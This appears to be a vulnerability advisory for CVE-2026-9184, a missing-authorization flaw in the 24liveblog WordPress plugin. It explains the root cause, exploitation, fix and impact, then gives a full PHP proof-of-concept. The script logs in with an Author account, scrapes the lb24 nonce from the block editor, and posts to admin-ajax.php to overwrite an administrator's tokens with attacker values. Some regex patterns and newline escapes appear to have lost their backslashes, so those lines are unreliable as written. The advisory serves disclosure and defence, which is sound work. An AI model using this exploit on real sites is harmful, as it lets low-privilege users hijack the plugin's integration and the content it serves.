Atomic Edge analysis of CVE-2026-9184 (metadata-based):
This vulnerability allows authenticated attackers with Author-level access to modify sensitive settings in the 24liveblog plugin (versions up to 2.2) via the update_lb24_token AJAX function. The CVSS score is 4.3 (Medium) with a CWE-862 (Missing Authorization) classification.
Root Cause: The update_lb24_token() AJAX handler only verifies a nonce (lb24) that is generated and localized to any user with block editor access. It does not perform any capability check or verify that the user_id parameter matches the requesting user. Atomic Edge analysis infers from the CWE and description that the vulnerable code likely registers the AJAX action with wp_ajax_* for authenticated users but omits the current_user_can() check and fails to validate user_id against get_current_user_id(). This is a classic missing authorization pattern where nonce existence is mistaken for authorization.
Exploitation: An attacker with an Author-level account (or higher) on the WordPress site must first load a page that includes the block editor interface to obtain the lb24 nonce. The nonce is typically exposed via a localized script variable or a hidden input field. Once the nonce is acquired, the attacker sends a POST request to /wp-admin/admin-ajax.php with action=update_lb24_token, nonce=lb24, user_id=TARGET_USER_ID (any valid user ID, such as an administrator), lb24_token=attacker_value, lb24_uid=attacker_value, lb24_refresh_token=attacker_value, and lb24_uname=attacker_value. The handler will overwrite the corresponding user meta for the targeted user and also update site-wide options, hijacking the integration with the 24liveblog service.
Remediation: The fix must add a capability check (e.g., current_user_can(‘edit_posts’) or a more restrictive capability) to the update_lb24_token() function before processing the request. Additionally, the handler should verify that the supplied user_id belongs to the current user using check_admin_referer() or by comparing user_id against get_current_user_id(). Atomic Edge analysis recommends that the plugin also implement a dedicated admin page with proper capability checks for managing the 24liveblog integration tokens rather than exposing this via an AJAX endpoint that relies solely on a nonce.
Impact: Attackers can overwrite the live blog integration tokens and user IDs for any user, including administrators. This allows them to hijack the plugin’s connection to the 24liveblog service, potentially replacing the legitimate blog content with malicious content from an attacker-controlled 24liveblog account. The site-wide options are also affected, making this a low-integrity impact (data modification) with no confidentiality or availability impact.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9184 - 24liveblog <= 2.2 - Missing Authorization to Authenticated (Author+) Settings Modification via update_lb24_token AJAX action
// IMPORTANT: This PoC requires an authenticated session cookie from an Author-level account or higher.
// The attacker must first obtain a valid lb24 nonce by loading a page that includes the block editor
// (e.g., editing a post). The nonce is typically exposed in a JavaScript variable or hidden field.
// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site URL
$username = 'attacker'; // Change this to an Author-level or higher account
$password = 'password'; // Change this to the account password
$target_user_id = 1; // Target user ID (e.g., admin) to overwrite tokens for
// Step 1: Login to WordPress to get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = [
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => 1
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
curl_close($ch);
// Step 2: Load the block editor to obtain the lb24 nonce
$editor_url = $target_url . '/wp-admin/post-new.php?post_type=post';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $editor_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$editor_response = curl_exec($ch);
curl_close($ch);
// Extract the lb24 nonce from the JavaScript window.lb24 object
// The nonce is typically in a script tag like: window.lb24 = {...}; or similar
$nonce = '';
if (preg_match('/vars+lb24s*=s*{[^}]*nonce[:s]*"([^"]+)"/i', $editor_response, $matches)) {
$nonce = $matches[1];
} elseif (preg_match('/"lb24_nonce"s*:s*"([^"]+)"/i', $editor_response, $matches)) {
$nonce = $matches[1];
} elseif (preg_match('/lb24.*nonce[^:]*:[^"'"']*["'"]?([a-f0-9]+)["'"]?/i', $editor_response, $matches)) {
$nonce = $matches[1];
}
if (empty($nonce)) {
die("[-] Could not extract lb24 nonce. The attacker must manually obtain it from the page source.n");
}
echo "[+] Extracted lb24 nonce: $noncen";
// Step 3: Exploit the vulnerability to overwrite user meta of the target user
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = [
'action' => 'update_lb24_token',
'lb24' => $nonce,
'user_id' => $target_user_id,
'lb24_token' => 'attacker_controlled_token_' . time(),
'lb24_uid' => 'attacker_uid_' . time(),
'lb24_refresh_token' => 'attacker_refresh_' . time(),
'lb24_uname' => 'attacker_username'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$exploit_response = curl_exec($ch);
curl_close($ch);
echo "[+] Exploit response: " . substr($exploit_response, 0, 500) . "n";
echo "[+] Tokens for user ID $target_user_id have been overwritten with attacker-controlled values.n";
// Clean up temporary cookie file
unlink('/tmp/cookies.txt');
